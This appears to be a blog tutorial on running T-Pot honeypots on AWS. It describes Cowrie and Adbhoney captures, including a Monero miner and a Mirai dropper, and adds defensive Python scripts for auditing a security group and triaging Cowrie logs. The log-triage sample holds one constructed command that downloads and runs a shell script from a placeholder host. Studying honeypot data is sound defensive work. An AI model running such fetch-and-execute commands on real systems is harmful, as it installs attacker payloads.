Catching malicious activities across cyber land
There are many ways to host these honeypots. My favorite is to use a cloud service, AWS. AWS is quick and easy, so I'll get to it with the short checklist below (exercise your google-fu if need be).
- Build a VPC with the VPC Wizard in AWS
- Create an EC2 instance with:
  - Debian 10 Buster AMI
  - t3.xlarge instance type
  - 128GB general purpose SSD (gp2)
- SSH into the instance to update and upgrade
- Install git, clone the tpotce repo, and install
- Set the inbound security group for the honeypot instance:
  - TCP 64295 from <yourIPaddress> for SSH admin
  - TCP 64297 from <yourIPaddress> for web admin
  - TCP 1–64000 from 0.0.0.0/0 for the bad guys
- Visit https://<ec2ipaddress>:64297
- Check Kibana and Spiderfoot
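The security group step is where a honeypot deployment most often goes wrong: the two admin ports must stay locked to your own address while the bait range stays wide open. The following check is an added example, not code from the original post or from the T-Pot project. It encodes the checklist's three rules as constructed data (the admin address is a placeholder) and flags any rule that exposes the T-Pot admin ports to the world or to a whole range.

```python
"""Sanity-check the inbound security group for a T-Pot honeypot instance.

Added example, not part of the original post or the T-Pot project. The three
rules below are a constructed copy of the post's checklist; the admin
address is a placeholder. The check flags the classic mistake of exposing
the T-Pot admin ports (SSH 64295, web UI 64297) to 0.0.0.0/0.
"""
import ipaddress

# T-Pot admin ports as listed in the post's checklist.
ADMIN_PORTS = {64295, 64297}

# Placeholder for <yourIPaddress>; use a /32 so only one host is allowed.
ADMIN_IP = "203.0.113.10/32"

# Constructed rule set mirroring the checklist.
RULES = [
    {"proto": "tcp", "from": 64295, "to": 64295, "cidr": ADMIN_IP, "note": "SSH admin"},
    {"proto": "tcp", "from": 64297, "to": 64297, "cidr": ADMIN_IP, "note": "web admin"},
    {"proto": "tcp", "from": 1, "to": 64000, "cidr": "0.0.0.0/0", "note": "honeypot services"},
]


def is_world_open(cidr):
    """True for 0.0.0.0/0 (or ::/0), i.e. reachable from anywhere."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0


def check_rules(rules):
    """Return a list of findings; an empty list means the rule set looks sane."""
    findings = []
    honeypot_range_open = False
    for rule in rules:
        ports = range(rule["from"], rule["to"] + 1)
        exposed_admin = sorted(p for p in ADMIN_PORTS if p in ports)
        net = ipaddress.ip_network(rule["cidr"], strict=False)
        if exposed_admin and net.prefixlen == 0:
            findings.append(
                f"rule '{rule['note']}' exposes admin port(s) {exposed_admin} to {rule['cidr']}")
        elif exposed_admin and net.num_addresses > 1:
            findings.append(
                f"rule '{rule['note']}' allows admin port(s) {exposed_admin} from a whole range ({rule['cidr']})")
        elif net.prefixlen == 0:
            # A world-open rule that does not touch the admin ports: this is the bait.
            honeypot_range_open = True
    if not honeypot_range_open:
        findings.append("no port range is open to 0.0.0.0/0; the honeypot will see almost no traffic")
    return findings


if __name__ == "__main__":
    for line in check_rules(RULES) or ["inbound rules look sane"]:
        print(line)
```

Run it against the rule set you are about to apply in the console; the same logic works on the output of an AWS CLI `describe-security-groups` call once you map the `IpPermissions` entries onto the `from`/`to`/`cidr` keys used here.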
As you can see from the very top image, many attacks have hit my honeypots. For today, I will focus on two honeypots.
1. Cowrie (4020 attacks)
2. Adbhoney (458 attacks)
The Cowrie honeypot is designed to log brute-force attacks and shell interactions when someone connects to our machine over SSH or Telnet. The Adbhoney honeypot is designed to catch malware activity from attackers hitting port 5555 (the Android Debug Bridge port). As a reminder, both of these honeypots are built to be vulnerable on purpose so we can log the activity and analyze it. Ok, let's see what the active defense honeypots have picked up!
Right off the bat, we can see from these pie charts:
- There are known attackers at work.
- Attacks are coming mostly from the United States.
- There is more SSH activity than Telnet, since Telnet has been deprecated due to known vulnerabilities and is no longer used in many companies. This results in Telnet being less targeted.
- A vulnerable SSH-2.0-libssh2_1.4.3 version is the one used the most here.
- A list of HASSH/IP fingerprints helps identify SSH client and server implementations.
Here is a tag cloud of the most used usernames and passwords tried against the SSH and Telnet services of our Cowrie honeypot.
- Common default usernames and passwords are used the most.
- A couple of IP addresses running the same credential list suggests an automated brute force using the same password list.
Here is the bottom of the dashboard. What we have seen so far has been a pretty high-level view just to get a sense of the environment in Cowrie over the 50 hour time frame. Now we can start tracking the source IP addresses, the Autonomous System Numbers (ASN), and the top malicious command line inputs used by the attackers.
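Everything the dashboard panels above show (top source IPs, the same credential list coming from several addresses, and commands that fetch a remote file) can be pulled straight from Cowrie's JSON log without Kibana. The script below is an added example, not code from the original post, from Cowrie or from T-Pot. Its log lines are constructed for the example; the field names (`eventid`, `src_ip`, `username`, `password`, `input`) follow Cowrie's `cowrie.json` format as I know it, and the IPs and URL are documentation/placeholder values.

```python
"""Triage Cowrie's JSON log the way the dashboard does: top source IPs,
shared credential lists, and commands that fetch remote files.

Added example, not part of the original post or of Cowrie/T-Pot. The log
lines are constructed for this example; field names (eventid, src_ip,
username, password, input) follow Cowrie's cowrie.json format as I know it,
and the IPs and URL are documentation/placeholder values.
"""
import json
import re
from collections import Counter, defaultdict

LOGIN_EVENTS = {"cowrie.login.failed", "cowrie.login.success"}
URL_RE = re.compile(r"https?://[^\s;'\"]+")

# Constructed sample of cowrie.json lines (one JSON object per line).
LOG_LINES = [
    '{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","username":"root","password":"123456"}',
    '{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","username":"admin","password":"admin"}',
    '{"eventid":"cowrie.login.failed","src_ip":"198.51.100.9","username":"root","password":"123456"}',
    '{"eventid":"cowrie.login.failed","src_ip":"198.51.100.9","username":"admin","password":"admin"}',
    '{"eventid":"cowrie.login.success","src_ip":"203.0.113.44","username":"root","password":"password"}',
    '{"eventid":"cowrie.command.input","src_ip":"203.0.113.44","input":"cd /tmp; wget http://dropper.invalid/x.sh; chmod +x x.sh; sh x.sh"}',
    '{"eventid":"cowrie.command.input","src_ip":"203.0.113.44","input":"uname -a"}',
    'this line is not JSON and is skipped',
]


def parse_cowrie(lines):
    """Parse JSON-per-line log text, skipping lines that are not valid JSON."""
    events = []
    for line in lines:
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def top_src_ips(events, n=5):
    """Most active source IPs across all event types, as (ip, count) pairs."""
    return Counter(e["src_ip"] for e in events if "src_ip" in e).most_common(n)


def shared_credential_lists(events, min_ips=2):
    """Group source IPs that tried exactly the same set of username/password
    pairs; identical lists from different IPs point at one automated tool."""
    creds_by_ip = defaultdict(set)
    for e in events:
        if e.get("eventid") in LOGIN_EVENTS:
            creds_by_ip[e["src_ip"]].add((e.get("username", ""), e.get("password", "")))
    ips_by_list = defaultdict(list)
    for ip, creds in creds_by_ip.items():
        ips_by_list[frozenset(creds)].append(ip)
    return [(sorted(ips), sorted(creds))
            for creds, ips in ips_by_list.items() if len(ips) >= min_ips]


def download_commands(events):
    """(src_ip, url) for every command that references a remote URL, which is
    where a post-login session starts pulling in a miner or bot payload."""
    hits = []
    for e in events:
        if e.get("eventid") == "cowrie.command.input":
            for url in URL_RE.findall(e.get("input", "")):
                hits.append((e["src_ip"], url))
    return hits


if __name__ == "__main__":
    evs = parse_cowrie(LOG_LINES)
    print("top source IPs:", top_src_ips(evs))
    print("shared credential lists:", shared_credential_lists(evs))
    print("download commands:", download_commands(evs))
```

On a real T-Pot box, feed `parse_cowrie` the lines of the Cowrie `cowrie.json` file instead of `LOG_LINES`; the URLs that `download_commands` returns are the ones to look up in VirusTotal or a sandbox before going any further.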
Before I go down a rabbit hole of investigation here, let's also give the Adbhoney honeypot dashboard an introduction.
Now it's time to look at some malware that attackers might push.
- Attacker known, meaning there are OSINT sources we can use to learn about our attacker.
- The country the attacks are coming from is also the US. A high level attacker can hide their true location, so this data might not be as useful.
- The frequency of the attacks is consistent over the 50 hour time frame, which likely suggests the attacks are scheduled and automated.
- ASN, source IPs, and command line input are my favorite sets of data. The command line inputs are worth investigating further, because an attacker who has gone far enough to input commands is likely trying to reach out to other machines to complete their attack.
The Proof Is In The Pudding
Below are two videos where I dive into what Cowrie and Adbhoney caught during the 50 hour time frame. My goal here is to show the process of using Kibana to further your investigation and analyze the malicious activity found.
For the Cowrie honeypot, we found commands that downloaded a malicious bash script and attempted to run it on our machine. This was a Monero miner script trying to use our machine's resources to mine crypto and then forward it to a digital wallet. The activity was seen using multiple IP addresses to achieve its goal.
For the Adbhoney honeypot, we saw command input that reached out to a link to download a file that is scripted to download more files. Those files are given full permissions in Linux and are executed. The attacker intends to turn a targeted machine into a Mirai bot to add to their botnet army for potential DDoS attacks.
Not to worry. Luckily, these activities are well known, as we saw in VirusTotal and Joe Sandbox. Chances are your anti-virus or Windows Defender is up to date with those malicious activities and known malicious IPs/URLs. Of course, closing the ports that use those vulnerable services is always a great idea. If you must have those ports open for a service to run your business, you had best patch/update the services you are using. Honeypots are great for slowing down attackers and learning their behavior through logs using Kibana.
I hope you all enjoyed the journey on what honeypots can do for us. Stay safe in the real world and the cyber world. See you all in the next discussion.